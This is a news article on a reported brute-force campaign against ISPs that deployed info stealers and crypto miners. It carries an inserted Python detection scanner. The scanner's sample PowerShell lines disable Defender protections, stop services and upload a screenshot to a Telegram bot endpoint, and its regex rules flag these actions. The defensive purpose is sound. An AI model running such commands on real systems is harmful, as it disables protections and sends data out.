Mass Exploitation Campaign Hits 4,000+ ISP Networks to Deploy Info Stealers and Crypto Miners

A devastating cyberattack has struck thousands of Internet Service Providers (ISPs) in China and the U.S. West Coast, leaving a trail of compromised systems and cryptocurrency mining operations in its wake. The Splunk Threat Research Team has uncovered a massive exploitation campaign from Eastern Europe that targets these ISPs to deploy info stealers and crypto miners on their networks.

The attack began with brute-force attacks against weak credentials, allowing threat actors to gain unauthorized access to the targeted systems. Once inside, they deployed cryptocurrency miners and crimeware tools with capabilities such as data exfiltration, persistence, self-termination, and pivot attacks. The malware also disabled remote access, further entrenching itself within the compromised systems.

"The Splunk Threat Research Team observed actors performing minimal intrusive operations to avoid detection," notes the report published by Splunk. "However, they created artifacts from already compromised accounts to maintain persistence." The attackers used tools that rely on scripting languages such as Python and PowerShell to execute their malicious operations under restricted environments.

The IP CIDR ranges observed in the attack suggest a specific targeting of ISP infrastructure, likely for cryptomining operations (XMR). Before executing their payload, the attackers disabled security features and terminated services that detect cryptominers. The folder containing the malware also included text files listing over 4,000 target IPs and passwords, focusing on ISPs in China and the U.S. West Coast.

Upon decoding the PowerShell scripts used by the attackers, experts discovered that they were attempting to prepare the compromised system for further payload execution. This preparation involved disabling security product features and terminating or stopping services associated with cryptominer detection.

The malware was capable of taking screenshots of the compromised host and capturing cryptocurrency wallet addresses from the clipboard. It then sent this data to its Command and Control (C2) server, which operated via a Telegram bot. The attackers' observed actions during entrenchment and subsequent operations on the targeted hosts relied on scripting languages, reducing their footprint and helping them avoid detection.
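A defender-side illustration of the behaviours described above, added here and not taken from the Splunk report: a small scanner that runs over constructed PowerShell script-block log entries and flags security-feature tampering, service termination, and Telegram bot API use. The sample entries and rule names are constructed for this example; the Telegram endpoint pattern assumes the public Bot API host.

```python
import re
from dataclasses import dataclass

# Constructed sample PowerShell script-block log entries (not from the Splunk
# report): one benign, three showing the behaviours the article describes.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
    "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath C:\\Users\\Public",
    "Get-Service | Where-Object Name -match 'miner|xmr|av' | Stop-Service -Force",
    "Invoke-RestMethod -Uri \"https://api.telegram.org/bot$token/sendPhoto\" -Method Post -Form @{photo=Get-Item $shot}",
]

# Each rule: (name, compiled regex), matched case-insensitively against the raw
# script text. Rule names are assumptions made for this example.
RULES = [
    ("defender_feature_disabled", re.compile(r"Set-MpPreference\s+-Disable\w+\s+\$?true", re.I)),
    ("defender_exclusion_added", re.compile(r"Add-MpPreference\s+-Exclusion\w+", re.I)),
    ("service_stopped", re.compile(r"\bStop-Service\b|\bsc(\.exe)?\s+stop\b", re.I)),
    ("telegram_bot_api", re.compile(r"api\.telegram\.org/bot", re.I)),
]

@dataclass(frozen=True)
class Finding:
    index: int       # position of the script block in the input list
    rule: str        # which rule fired
    snippet: str     # the matched text, for the analyst

def scan_script_blocks(blocks):
    """Return a Finding for every (block, rule) pair that matches."""
    findings = []
    for i, text in enumerate(blocks):
        for name, rx in RULES:
            m = rx.search(text)
            if m:
                findings.append(Finding(i, name, m.group(0)))
    return findings

def suspicious_blocks(blocks):
    """Indices of blocks that trigger at least one rule, in order."""
    return sorted({f.index for f in scan_script_blocks(blocks)})

if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {f.index}: {f.rule} -> {f.snippet!r}")
```

In a real deployment the same rules would be applied to PowerShell script-block logging output (Event ID 4104) collected centrally, and any hit on a production host should trigger a review of recent authentication events for brute-force activity.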

"These actions could be described as 'just enough' to successfully operate on victims and obtain as much processing power as possible," concludes the report. This level of sophistication highlights the evolving nature of cyber threats and the need for robust security measures to protect against such attacks.

Key Takeaways:

  • The attack targeted ISPs in China and the U.S. West Coast, deploying info stealers and crypto miners on compromised systems.
  • The attackers used weak credential brute force attacks to gain access to the targeted systems.
  • The malware disabled remote access and entrenched itself within the compromised systems.
  • The attack relied on scripting languages such as Python and PowerShell to execute malicious operations.
  • The folder containing the malware included text files listing over 4,000 target IPs and passwords.

Stay Safe Online:

To protect yourself from similar attacks, it is essential to maintain robust security measures. This includes:

  • Using strong, unique passwords for all accounts.
  • Enabling two-factor authentication whenever possible.
  • Keeping your operating system and software up-to-date with the latest security patches.
  • Being cautious when clicking on links or downloading attachments from unknown sources.

Stay informed about the latest cybersecurity threats by following reputable sources and taking proactive steps to protect your online presence.